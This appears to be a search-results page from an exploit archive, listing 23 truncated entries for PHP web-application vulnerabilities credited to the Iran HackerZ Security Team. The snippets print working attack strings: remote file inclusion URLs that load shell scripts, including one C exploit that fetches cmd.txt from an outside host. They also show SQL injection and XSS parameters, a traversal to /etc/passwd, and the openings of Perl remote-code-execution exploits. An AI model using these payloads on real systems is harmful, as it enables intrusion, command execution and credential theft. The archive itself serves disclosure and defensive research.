23 matches found
PHPSelect Submit-A-Link HTML Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/17348/info Submit-A-Link is prone to an HTML-injection vulnerability. The script fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code woul...
phplinkexchange.txt
vendor :www.idevspot.com Demo : www.idevspot.com/demo/PhpStart/PhpLinkExchange By : s3rv3rhack3r www: hackerz.ir & h4ckerz.com remote file include : http://www.domain.com/PhpLinkExchange/bitslistings.php?svrrootPhpStart=shell.txt? xss: http://www.domain.com/PhpLinkExchange/useradd.php?msg=xss...
koobi.txt
vendor:http://www.dream4.de dork:"powered by Koobi Pro 5.6" vuln : http://host/index.php?p=showtopic&toid=SQL http://host/index.php?p=showtopic&toid=XSS Path Disclosure:http://host/index.php?area=1&p=' Author : Vampire [email protected] Homepage : Www.HackerZ.iR Www.H4ckerZ.Com Iran...
Koobi Pro CMS 5.6 SQL injection & XSS
vendor:http://www.dream4.de dork:"powered by Koobi Pro 5.6" vuln : http://host/index.php?p=showtopic&toid=SQL http://host/index.php?p=showtopic&toid=XSS Path Disclosure:http://host/index.php?area=1&p=' Author : Vampire [email protected] Homepage : Www.HackerZ.iR Www.H4ckerZ.Com Iran...
otopholder 1.8 suffers from a local file inclusion,XSS and directory listing vuln
vendor: http://www.jakeo.com vuln : http://host/foto/index.php?path=../../etc/passwd http://host/foto/index.php?path=bxss/b http://host/foto/index.php?path=../../directory listing Author : Vampire [email protected] Homepage : Www.HackerZ.iR Www.H4ckerZ.Com Iran HackerZ Security Team...
Vwar v1.5.0 <= Sql Injection and XSS vuln.
IHST Iran HackerZ Security Team WhiteHat Part ------------------------------------------------- Vendor : www.vwar.de vuln. Version = v1.5.0 and lower Credits : MFox Contact : [email protected] HomePage : www.hackerz.ir ------------------------------------------------- Proof of Concept...
VanillaCMS.txt
Vanilla CMS = 1.0.1 RootDirectory Remote file inclusion Vuln. Vendor : Vanilla CMS Demo : http://demo.opensourcecms.com/vanilla/ Get Source : http://getvanilla.org/ Vuln type : Remote Risk : High Author : MFox HomePage : Http://hackerz.ir/ Team : IHST Iran HackerZ Security Team Contact :...
[KurdishVanilla CMS <= 1.0.1 (RootDirectory) Remote file inclusion Vuln.]
Vanilla CMS = 1.0.1 RootDirectory Remote file inclusion Vuln. Vendor : Vanilla CMS Demo : http://demo.opensourcecms.com/vanilla/ Get Source : http://getvanilla.org/ Vuln type : Remote Risk : High Author : MFox HomePage : Http://hackerz.ir/ Team : IHST Iran HackerZ Security Team Contact :...
Foing-xpl.txt
vendor : phpbbhacks.com Exploit BY :s3rv3rhack3r WWW : http://www.hackerz.ir Exploit / Foing Remote File Include exploit By s3rv3rhack3r / include include include include include include include include define PORT 80 char shellop = "GET /index.php?phpbbrootpath=http://www.hackerz.ir/cmd.txt?cmd=...
toplistInclude.txt
IHST - MFox [email protected] - Vendor = TopList PHPBB - Target = list.php - Exploit : http://target/top/list.php?returnpath=shellurl Bug Discovered by MFox Special thanks to all of my friendZ IHST - Iran HackerZ Security Team irc.governmentsecurity.org h4ckerz.com Www.Hackerz.Com -...
TopList <= 1.3.8 (PHPBB Hack) Remote File Inclusion Vulnerability
IHST - MFox [email protected] - Vendor = TopList PHPBB - Target = list.php - Exploit : http://target/top/list.php?returnpath=shellurl Bug Discovered by MFox Special thanks to all of my friendZ IHST - Iran HackerZ Security Team irc.governmentsecurity.org h4ckerz.com Www.Hackerz.Com -...
linksubmit <= All version Html Tag Injector in index.php
Vendor : linksubmit Version : All Version www : http://www.phpselect.com AUTHOR : s3rv3rhack3r you can submit html tag's in $description linksubmit.php Exploit : !/usr/bin/perl Exploit by s3rv3rhack3r Special Thanx : hessamx , f0rk ,sattar.li , stanic, mfox,blood moon and.. / | | | / / | |/ // / ...
PHPSelect Submit-A-Link - HTML Injection
source: https://www.securityfocus.com/bid/17348/info Submit-A-Link is prone to an HTML-injection vulnerability. The script fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would be executed in the context of th...
GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (2)
No description provided by source. !/usr/bin/perl Exploit by Hessam-x www.hessamx.net Special Thanx : Vampire , s3rv3rhack3r / | \ | | / \ \ / | |/ // \ \ / \ Y // \ | \ /| | // / | / \ | \ | / \ / / / / / / Iran Hackerz Security Team WebSite: www.hackerz.ir DeltaHAcking Team website:...
GreyMatter WebLog 1.21d - Remote Command Execution (2)
GreyMatter WebLog 1.21d - Remote Command Execution 2 !/usr/bin/perl Exploit by Hessam-x www.hessamx.net Special Thanx : Vampire , s3rv3rhack3r / | \ | | / \ \ / | |/ // \ \ / \ Y // \ | | \ | / \ / / / / / / Iran Hackerz Security Team WebSite: www.hackerz.ir DeltaHAcking Team website:...
GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (2)
Exploit for unknown platform in category web applications =============================================================== GreyMatter WebLog | \ | / \ / / / / / / Iran Hackerz Security Team DeltaHAcking Team Name : Greymatter Site : http://www.noahgrey.com/greysoft/ example: target :...
GreyMatter WebLog 1.21d - Remote Command Execution (2)
!/usr/bin/perl Exploit by Hessam-x www.hessamx.net Special Thanx : Vampire , s3rv3rhack3r / | \ | | / \ \ / | |/ // \ \ / \ Y // \ | | \ | / \ / / / / / / Iran Hackerz Security Team WebSite: www.hackerz.ir DeltaHAcking Team website: www.deltahacking.com Name : Greymatter Site :...
Light Weight Calendar 1.x - date Remote Code Execution
Light Weight Calendar 1.x - date Remote Code Execution !/usr/bin/perl Light Weight Calendar Exploit by Hessam-x www.hessamx.net / | \ | | / \ \ / | |/ // \ \ / \ Y // \ | | \ | / \ / / / / / / Iran Hackerz Security Team WebSite: www.hackerz.ir Name : Light Weight Calendar version : 1. use...
Light Weight Calendar 1.x - 'date' Remote Code Execution
!/usr/bin/perl Light Weight Calendar Exploit by Hessam-x www.hessamx.net / | \ | | / \ \ / | |/ // \ \ / \ Y // \ | | \ | / \ / / / / / / Iran Hackerz Security Team WebSite: www.hackerz.ir Name : Light Weight Calendar version : 1. use LWP::Simple; print...
Farsinews 2.5 - Directory Traversal Arbitrary users.db Access
Farsinews 2.5 - Directory Traversal Arbitrary users.db Access !/usr/bin/perl FarsiNews 2.5pro Show User&Passowrd Exploit by Hessam-x www.hessamx.net / | \ | | / \ \ / | |/ // \ \ / \ Y // \ | | \ | / \ / / / / / / Iran Hackerz Security Team WebSite: www.hackerz.ir Description Name :...